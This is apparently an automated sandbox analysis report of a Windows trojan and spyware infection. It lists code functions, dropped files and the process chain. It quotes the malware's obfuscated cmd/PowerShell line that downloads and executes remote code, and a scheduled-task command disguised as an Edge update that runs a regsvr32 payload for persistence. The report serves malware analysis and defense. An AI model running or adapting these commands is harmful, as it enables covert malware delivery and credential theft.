Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03CA4A0 18_2_00007FF7F03CA4A0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F044E4C0 18_2_00007FF7F044E4C0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03E4579 18_2_00007FF7F03E4579
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0448520 18_2_00007FF7F0448520
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03C26E2 18_2_00007FF7F03C26E2
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0456710 18_2_00007FF7F0456710
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F04506A0 18_2_00007FF7F04506A0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03EA740 18_2_00007FF7F03EA740
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0454750 18_2_00007FF7F0454750
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F04227A4 18_2_00007FF7F04227A4
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03C47CD 18_2_00007FF7F03C47CD
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03CC860 18_2_00007FF7F03CC860
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03F0870 18_2_00007FF7F03F0870
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03D0820 18_2_00007FF7F03D0820
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F042A990 18_2_00007FF7F042A990
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0442920 18_2_00007FF7F0442920
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0434920 18_2_00007FF7F0434920
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0438A20 18_2_00007FF7F0438A20
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0452B00 18_2_00007FF7F0452B00
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03F4AC0 18_2_00007FF7F03F4AC0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03F2B80 18_2_00007FF7F03F2B80
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0454BF0 18_2_00007FF7F0454BF0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03F8C00 18_2_00007FF7F03F8C00
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F045EC60 18_2_00007FF7F045EC60
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03CAC30 18_2_00007FF7F03CAC30
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0458CF0 18_2_00007FF7F0458CF0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0450CE0 18_2_00007FF7F0450CE0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F041ED00 18_2_00007FF7F041ED00
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0428CAC 18_2_00007FF7F0428CAC
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03E0D80 18_2_00007FF7F03E0D80
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F045ADE0 18_2_00007FF7F045ADE0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03BEDB4 18_2_00007FF7F03BEDB4
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0402E70 18_2_00007FF7F0402E70
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F043CFCB 18_2_00007FF7F043CFCB
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03EF060 18_2_00007FF7F03EF060
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03CF030 18_2_00007FF7F03CF030
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F041D0A0 18_2_00007FF7F041D0A0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F043F0A0 18_2_00007FF7F043F0A0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB62D24 18_2_000002A4ACB62D24
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB65ADC 18_2_000002A4ACB65ADC
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB93A4D 18_2_000002A4ACB93A4D
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB83A38 18_2_000002A4ACB83A38
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB6DCE4 18_2_000002A4ACB6DCE4
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB77684 18_2_000002A4ACB77684
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB85918 18_2_000002A4ACB85918
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB7D854 18_2_000002A4ACB7D854
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB8F940 18_2_000002A4ACB8F940
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB67270 18_2_000002A4ACB67270
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB514D0 18_2_000002A4ACB514D0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB895D4 18_2_000002A4ACB895D4
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB855B0 18_2_000002A4ACB855B0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB6F618 18_2_000002A4ACB6F618
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB6D010 18_2_000002A4ACB6D010
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB66F24 18_2_000002A4ACB66F24
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB77094 18_2_000002A4ACB77094
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB8F1D0 18_2_000002A4ACB8F1D0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB84A50 18_2_000002A4ACB84A50
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB8CC00 18_2_000002A4ACB8CC00
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB76D18 18_2_000002A4ACB76D18
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB8ECE4 18_2_000002A4ACB8ECE4
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB84DE8 18_2_000002A4ACB84DE8
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB90D90 18_2_000002A4ACB90D90
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB786B4 18_2_000002A4ACB786B4
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB52628 18_2_000002A4ACB52628
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB8A81C 18_2_000002A4ACB8A81C
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB6C750 18_2_000002A4ACB6C750
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB848D0 18_2_000002A4ACB848D0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB90874 18_2_000002A4ACB90874
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB8E984 18_2_000002A4ACB8E984
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB5C25C 18_2_000002A4ACB5C25C
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB90270 18_2_000002A4ACB90270
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB6E398 18_2_000002A4ACB6E398
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB96434 18_2_000002A4ACB96434
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB80478 18_2_000002A4ACB80478
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB85EC8 18_2_000002A4ACB85EC8
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB6BEB8 18_2_000002A4ACB6BEB8
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB73EA4 18_2_000002A4ACB73EA4
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB83F70 18_2_000002A4ACB83F70
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB70174 18_2_000002A4ACB70174
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Gga6.ini 55A451457DBC1F6D28A4C1AB2D477FBBFAE002999A0789C9F3D1BD6610511D98
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\M08e.ini BE86E0357748F3B4FA166342F284800A83C955C2C8B197475C2450613A6EED67
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\utox_x86_x64.exe D7BD224B2EF0014C679046C917BECFFACE5F5ABA2FBDB7DD3C17FE964C3CEE97
Found potential string decryption / allocating functions
Source: C:\Windows\System32\rekeywiz.exe Code function: String function: 00007FF7F045D4B0 appears 72 times
Source: C:\Windows\System32\rekeywiz.exe Code function: String function: 00007FF7F0447030 appears 31 times
Source: C:\Windows\System32\rekeywiz.exe Code function: String function: 00007FF7F045C954 appears 41 times
Source: C:\Windows\System32\rekeywiz.exe Code function: String function: 00007FF7F0447290 appears 129 times
Source: C:\Windows\System32\rekeywiz.exe Code function: String function: 00007FF7F03C7EF0 appears 224 times
Source: C:\Windows\System32\rekeywiz.exe Code function: String function: 00007FF7F044C9D0 appears 64 times
Source: C:\Windows\System32\rekeywiz.exe Code function: String function: 00007FF7F0447520 appears 48 times
Source: C:\Windows\System32\rekeywiz.exe Code function: String function: 00007FF7F0410EF0 appears 40 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF63D280EF0 appears 40 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF63D2B7030 appears 31 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF63D237EF0 appears 224 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF63D2B7520 appears 48 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF63D2BC9D0 appears 64 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF63D2CC954 appears 41 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF63D2B7290 appears 129 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF63D2CD4B0 appears 72 times
PE file contains more sections than normal
Source: ajbs50ul.bat.3.dr Static PE information: Number of sections : 11 > 10
Source: M08e.ini.4.dr Static PE information: Number of sections : 11 > 10
Source: utox_x86_x64.exe.3.dr Static PE information: Number of sections : 21 > 10
Source: 9.2.regsvr32.exe.12909ac0.3.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.regsvr32.exe.12909ac0.3.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.3.regsvr32.exe.2554f70.6.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.3.regsvr32.exe.2554f70.6.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.regsvr32.exe.1b040000.4.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.regsvr32.exe.1b040000.4.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.regsvr32.exe.2554f70.0.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.regsvr32.exe.2554f70.0.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.3.regsvr32.exe.2554f70.7.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.3.regsvr32.exe.2554f70.7.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.spyw.evad.winLNK@30/20@3/32
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2785F0 memset,FormatMessageW,GetLastError, 4_2_00007FF63D2785F0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D287140 CreateToolhelp32Snapshot,memset,Module32FirstW,Module32NextW,UnmapViewOfFile,CloseHandle,UnmapViewOfFile,CloseHandle,CloseHandle, 4_2_00007FF63D287140
Source: C:\Users\user\Desktop\utox_x86_x64.exe Code function: 8_2_00614FA0 CoInitialize,CoInitialize,CoCreateInstance,CoCreateInstance,CoUninitialize,PeekMessageA,SetEvent,SetEvent,GetMessageA,GetMessageA,CoUninitialize,SetEvent,SetEvent, 8_2_00614FA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\ajbs50ul.bat Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4152:120:WilError_03
Source: C:\Windows\System32\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\cbRHd
Source: C:\Users\user\Desktop\utox_x86_x64.exe Mutant created: \Sessions\1\BaseNamedObjects\uTox
Source: C:\Windows\System32\rekeywiz.exe Mutant created: \Sessions\1\BaseNamedObjects\MUTEX
Source: C:\Windows\System32\OpenWith.exe Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3576:120:WilError_03
Source: C:\Windows\System32\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\Jason_OsodJpavasJmnlndsto
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fkvuje5c.ujv.ps1 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\OpenWith.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: OpenWith.exe, 0000000E.00000003.1772221691.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1733264637.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1741663241.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1752960096.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1744735797.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1773158578.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1739181531.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1774030054.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1717266160.000001F9E06CD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1744476159.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1743945250.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: OpenWith.exe, 0000000E.00000003.1772221691.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1733264637.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1741663241.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1752960096.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1744735797.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1773158578.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1739181531.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1774030054.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1717266160.000001F9E06CD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1744476159.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1743945250.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: OpenWith.exe, 0000000E.00000003.1772221691.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1733264637.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1741663241.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1752960096.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1744735797.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1773158578.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1739181531.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1774030054.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1717266160.000001F9E06CD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1744476159.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1743945250.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: OpenWith.exe, 0000000E.00000003.1772221691.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1733264637.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1741663241.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1752960096.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1744735797.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1773158578.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1739181531.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1774030054.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1717266160.000001F9E06CD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1744476159.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1743945250.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: OpenWith.exe, 0000000E.00000003.1772221691.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1733264637.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1741663241.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1752960096.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1744735797.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1773158578.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1739181531.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1774030054.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1717266160.000001F9E06CD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1744476159.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1743945250.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: OpenWith.exe, 0000000E.00000003.1772221691.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1733264637.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1741663241.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1752960096.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1744735797.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1773158578.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1739181531.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1774030054.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1717266160.000001F9E06CD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1744476159.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1743945250.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: OpenWith.exe, 0000000E.00000003.1775940842.000001F9E0411000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775675719.000001F9E0CC6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1774918323.000001F9E0CC6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: OpenWith.exe, 0000000E.00000003.1772221691.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1733264637.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1741663241.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1752960096.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1744735797.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1773158578.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1739181531.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1774030054.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1717266160.000001F9E06CD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1744476159.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1743945250.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: fBcMVl6ns6.lnk ReversingLabs: Detection: 26%
Source: utox_x86_x64.exe String found in binary or memory: impossible: unknown friend-add error
Source: utox_x86_x64.exe String found in binary or memory: -h --help Shows this help text.
Source: utox_x86_x64.exe String found in binary or memory: -h --help Shows this help text.
Source: utox_x86_x64.exe String found in binary or memory: Search/Add Friends
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c p""ow""er""s""h""ell/""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe p""ow""er""s""h""ell /""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\ajbs50ul.bat "C:\Users\Public\ajbs50ul.bat"
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C8CCCCC-0448-48C8-C088-8CCCC0000044}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\Desktop\utox_x86_x64.exe "C:\Users\user\Desktop\utox_x86_x64.exe"
Source: unknown Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe"
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C0C80C0-8884-4C8C-CCC0-CC80C840C404}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
